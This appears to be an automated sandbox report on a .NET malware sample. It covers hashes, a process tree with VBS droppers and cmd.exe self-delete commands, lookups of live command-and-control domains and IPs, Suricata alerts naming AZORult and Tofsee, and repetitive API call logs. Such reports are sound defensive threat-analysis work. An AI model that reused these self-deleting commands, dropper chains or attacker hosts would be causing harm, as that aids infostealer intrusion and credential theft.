Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 6, 2021, 6:19 p.m.	Sept. 6, 2021, 6:21 p.m.

Size	1.4MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`b23d6c569893579789695f3d05accbe1`
SHA256	`93ddf61c1aa7c0b867ffbd579b9febdeed4b027d14f8b86d62f7da493706731c`
CRC32	`9FA407F3`
ssdeep	`24576:ckJ57Lut19vrBg9qm+BZkvgt7DYOl+FbSoLCwcpN5tgLG6OI8mMe2WLPFouz:T7LG1V/dBZkY1Yo+X+tgLGPi2WLPFou`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) IsPE32 - (no description)

ghjkl.exe "C:\Users\test22\AppData\Local\Temp\ghjkl.exe"
2768
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
  3016
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
  2112
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
  200
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
  1348
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
  1204
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
  2356
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
  1868
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
  2200
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
  808
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
  2668
- wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\Dewgkwlbhkrsncbybkhtfpkb.vbs"
  2856
  - Oggnfkemtibcinconsoleapp16.exe "C:\Users\test22\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe"
    2072
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
      2656
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
      2240
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
      2208
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
      2684
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
      2880
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
      2248
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
      1296
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
      3024
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
      1472
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
      1444
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\Ddmmvlnwvosotwcisp.vbs"
      192
      - Hsbvhggsqlrfmuvyptooonsoleapp5.exe "C:\Users\test22\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe"
        2552
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
        2080
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
        3108
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
        3248
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
        3360
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
        3472
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
        3616
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
        3728
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
        3840
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
        4064
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
        3228
        
        Hsbvhggsqlrfmuvyptooonsoleapp5.exe C:\Users\test22\AppData\Local\Temp\Hsbvhggsqlrfmuvyptooonsoleapp5.exe
        3324
    - Oggnfkemtibcinconsoleapp16.exe C:\Users\test22\AppData\Local\Temp\Oggnfkemtibcinconsoleapp16.exe
      1908
      - cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Oggnfkemtibcinconsoleapp16.exe"
        3488
        
        timeout.exe C:\Windows\system32\timeout.exe 3
        3520
- ghjkl.exe C:\Users\test22\AppData\Local\Temp\ghjkl.exe
  2716
  - cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\ghjkl.exe"
    3944
    - timeout.exe timeout /T 10 /NOBREAK
      4008
explorer.exe C:\Windows\Explorer.EXE
1848

Name	Response	Post-Analysis Lookup
google.com	A 142.250.196.110	172.217.175.78
telete.in	A 195.201.225.248	195.201.225.248
mazooyaar.ac.ug	A 185.215.113.77	185.215.113.77
mazoyer.ac.ug	A 185.215.113.77	185.215.113.77

IP Address	Status	Action
142.250.196.110	Active	Moloch
164.124.101.2	Active	Moloch
185.215.113.77	Active	Moloch
195.201.225.248	Active	Moloch
45.142.215.237	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49215 -> 195.201.225.248:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 45.142.215.237:80 -> 192.168.56.101:49220	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.142.215.237:80 -> 192.168.56.101:49220	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 45.142.215.237:80 -> 192.168.56.101:49220	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49238	2400024	ET DROP Spamhaus DROP Listed Traffic Inbound group 25	Misc Attack
TCP 185.215.113.77:80 -> 192.168.56.101:49238	2029138	ET MALWARE AZORult v3.3 Server Response M3	Malware Command and Control Activity Detected
TCP 185.215.113.77:80 -> 192.168.56.101:49329	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.77:80 -> 192.168.56.101:49313	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49215 195.201.225.248:443	C=US, O=Let's Encrypt, CN=R3	CN=telecut.in	be:a6:3d:e8:93:c3:13:0b:5f:1d:3a:f7:63:57:4c:39:0e:96:df:5e

Queries for the computername (50 out of 255 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2021, 6:19 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (36 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:19 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0
IsDebuggerPresent Sept. 6, 2021, 6:20 p.m.			0	0

Command line console output was observed (50 out of 99 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000037	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000037	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000037	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000037	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000037	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000037	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000037	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: WARNING: 2 columns do not fit into the display and were removed. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: Source Destination IPV4Address IPV6Address console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000033	1	1
WriteConsoleW Sept. 6, 2021, 6:19 p.m.	buffer: TEST22-PC google.com 142.250.196.110 {} console_handle: 0x00000037	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 1296 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004596a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00458ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00458ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005910c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005910c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005910c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005910c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005910c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005910c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00590ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2021, 6:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00591180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
